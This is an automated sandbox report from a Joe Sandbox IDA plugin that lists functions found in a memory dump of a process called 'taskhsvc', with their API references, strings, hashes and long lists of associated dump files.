API String ID: 3961263387-112844655
Opcode ID: f3994b1c72b67e283bc517c6f76c1a75d5057d8afc36da6b05da686ba7f89ce2
Instruction ID: 3311bada003e4181ccc0340c5ecee36455e1e052fd7930e005940382f01935f9
Opcode Fuzzy Hash: f3994b1c72b67e283bc517c6f76c1a75d5057d8afc36da6b05da686ba7f89ce2
Instruction Fuzzy Hash: 609116B4A04305DFEB10EFA9D185BADBBF0AB48350F04842AE988E7355D739D945CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00EFE618 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00EF888C: strlen.MSVCRT ref: 00EF88DC
Part of subcall function 00EF888C: __stack_chk_fail.LIBSSP-0 ref: 00EF895C

free.MSVCRT ref: 00EFE7DC
__stack_chk_fail.LIBSSP-0 ref: 00EFE7F6

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Strings

o, xrefs: 00EFE70E

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$freestrlen
String ID: o
API String ID: 1708192973-252678980
Opcode ID: 1894a984a94c3bcd97a1294b21b95eaf9bfb874887bb17d87c155c8b72eade61
Instruction ID: a3618fce2edbb9ea234adbaf00711eccab94ec6920b9b3d7d5b0dbd8fd8d9961
Opcode Fuzzy Hash: 1894a984a94c3bcd97a1294b21b95eaf9bfb874887bb17d87c155c8b72eade61
Instruction Fuzzy Hash: EB5184B4904349DFDB04EFA9C5857AEBBF0BF48304F118829E594A7390D7799A84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00F03BFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00F03C50
abort.MSVCRT ref: 00F03CED
abort.MSVCRT ref: 00F03D40
__stack_chk_fail.LIBSSP-0 ref: 00F03D71

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

~, xrefs: 00F03CDD

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort$strrchr
String ID: ~
API String ID: 2024191972-1707062198
Opcode ID: 438b57d801a3bd0666fa5dd7d27c3d3026ec9faa067554f6ee235baa8c400857
Instruction ID: 11799d298ba7f7b8fc5a0a9e0ffd6d191f9543ca1f220cb0e998a009ab03114e
Opcode Fuzzy Hash: 438b57d801a3bd0666fa5dd7d27c3d3026ec9faa067554f6ee235baa8c400857
Instruction Fuzzy Hash: B74107B4A0431ADFCB04EFA9C5859AEBBF0BF44304F058828E494AB356D738E984DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00D92EC2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

time.MSVCRT ref: 00D92F64
__stack_chk_fail.LIBSSP-0 ref: 00D92F95

Strings

socket %d wants to read., xrefs: 00D92ECC
../src/or/main.c, xrefs: 00D92F3A
conn_read_callback, xrefs: 00D92ED4

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$time
String ID: ../src/or/main.c$conn_read_callback$socket %d wants to read.
API String ID: 2236482411-1261548048
Opcode ID: 7ef299ee14efd8dc1a6c3f543847b6cc388ce7ae91df4eeff7bafc7a926a0b78
Instruction ID: 0726576b92f61cce04062166954bddf6d3e71825de310851c8c3a620fae9f854
Opcode Fuzzy Hash: 7ef299ee14efd8dc1a6c3f543847b6cc388ce7ae91df4eeff7bafc7a926a0b78
Instruction Fuzzy Hash: 3F21D5B4A183569FCB00EFA9C445A6EBBF0FF05304F094809F4A8DB256D734D841DB26

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1282 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EF12DB
realloc.MSVCRT ref: 00EF12FA
exit.MSVCRT ref: 00EF133B
__stack_chk_fail.LIBSSP-0 ref: 00EF134E

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

@, xrefs: 00EF1320

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortexitrealloc
String ID: @
API String ID: 351688620-2766056989
Opcode ID: 5c059b283c3d0217134ef1045507527e92bc12148213e1fd883982a8735777b0
Instruction ID: 1eb435f861d558c474b3b1002ebdbcc6042a814dfcc829ba0ca1febe35fa81ea
Opcode Fuzzy Hash: 5c059b283c3d0217134ef1045507527e92bc12148213e1fd883982a8735777b0
Instruction Fuzzy Hash: B02114B490430ADFDB04EFA5C5457AEBBF4BF48348F00882CE494AB241C7789945DF56

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8F30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EE8F86
localtime.MSVCRT ref: 00EE8F91
memcpy.MSVCRT ref: 00EE8FB4
__stack_chk_fail.LIBSSP-0 ref: 00EE8FE5

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

$, xrefs: 00EE8F9F

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
